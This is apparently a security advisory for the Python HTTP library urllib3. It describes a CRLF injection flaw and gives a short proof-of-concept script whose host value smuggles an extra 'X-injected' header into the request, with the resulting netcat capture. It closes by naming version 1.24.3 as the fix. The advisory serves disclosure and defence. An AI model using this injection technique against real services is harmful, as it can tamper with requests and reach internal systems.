urllib3 is an HTTP library with thread-safe connection pooling, file post, and more.
Affected versions of this package are vulnerable to CRLF injection. Attacker who has the control of the requesting address parameter, could manipulate an HTTP header and attack an internal service.
import urllib3 pool_manager = urllib3.PoolManager() host = "localhost:7777?a=1 HTTP/1.1\r\nX-injected: header\r\nTEST: 123" url = "http://" + host + ":8080/test/?test=a" try: info = pool_manager.request('GET', url).info() print(info) except Exception: pass # nc -l localhost 7777 GET /?a=1 HTTP/1.1 X-injected: header TEST: 123:8080/test/?test=a HTTP/1.1 Host: localhost:7777 Accept-Encoding: identity
The nc server will display the HTTP request with a manipulated header content:
X-injected:header, indicating a successful injection of the HTTP header.
urllib3 to version 1.24.3 or higher.